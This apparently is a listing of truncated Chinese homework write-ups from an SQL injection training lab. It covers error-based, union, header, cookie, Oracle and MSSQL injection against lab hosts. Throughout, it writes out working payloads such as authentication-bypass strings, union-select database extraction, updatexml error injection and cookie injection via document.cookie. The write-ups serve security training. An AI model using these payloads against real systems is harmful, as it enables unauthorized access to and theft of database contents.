盲注跟延时
11111
宽字节注入Rank 1-3
看文件
post注入作业1-3
万能密码1' or 1=1 #绕过密码验证rank1那么用报错的方式来获得信息可以输入'order by 3 #报错回显Unknown column '3' in 'order clause''order by 2 #报错信息消失了这就可以确定为两个列爆库名' union select 1,database()#接下来走流程拿到fla
Header注入1-3作业
QL注入-Header注入Rank 1----------------------通过测试,我们发现本关注入点在http头的UA,而且是报错注入,当前数据库名判断1' or updatexml(1,concat(0x7e,(select database()),0x7e),1))#查表1' or updatexml(1,concat(0x7e,(select table_name
SQL注入-显错注入Rank 1-4
进入页面看到我们输入的传参在后台sql查询中是加了单引号的,只要想办法构造我们需要的sql查询语句
Oracle注入- 报错注入
http://o1.lab.aqlab.cn:81/?id=1'--正常回显示'order by 1--'order by 2--'order by 3--'order by 4--到4不能正常回显说明只有3个字段union all select null,null,null from dual(因为我不知道他有什么表,所以就用这个虚表)第一个显示点应该是数
作业MSSQL注入 - 反弹注入
第一步http://120.203.13.75:8150/MSSQL/?id=2' and 1=1--用' and 1=1--查看是否存在注入(MSSQL注入时需要先闭合前面语句和注释后面语句所以需要在ID=2后面先加一个'闭合前面语句然后在语句结尾加--注释掉后面语句)结果显示存在注入第二步http://120.203.13.75:8150/MSSQL/?id=2%27%
作业SQL 注入 - 全方位利用
and1=1 正常 and1=2 不正常 order by 2 正常 order by 3 不正常 and 1=2 union select 1,2 页面回显查询数据库名 union select 1,database() 继续查里面的内容 执行语句 union select 1,group_concat(t
作业-偏移注入
cookie注入通过控制台执行语句后刷新需要一个字段足够多的表可以在产品中心测试document.cookie="id="+escape("105 order by 26"); 猜字段数document.cookie="id="+escape("1 union select 1,2,3,4,5,6,7,8,9,10,11,12,
Cookie注入笔记
找到注入点http://120.203.13.75:8001/shownews.asp?id=171下面使用Firefox的HackBar插件尝试在cookie里进行注入先将参数id=171放到cookie,然后点击Execute,发现页面依旧正常显示,再将Cookie的值改为id=171+and+1=2,页面显示错误这说明存在Cookie注入。 id=171+order+by+10正确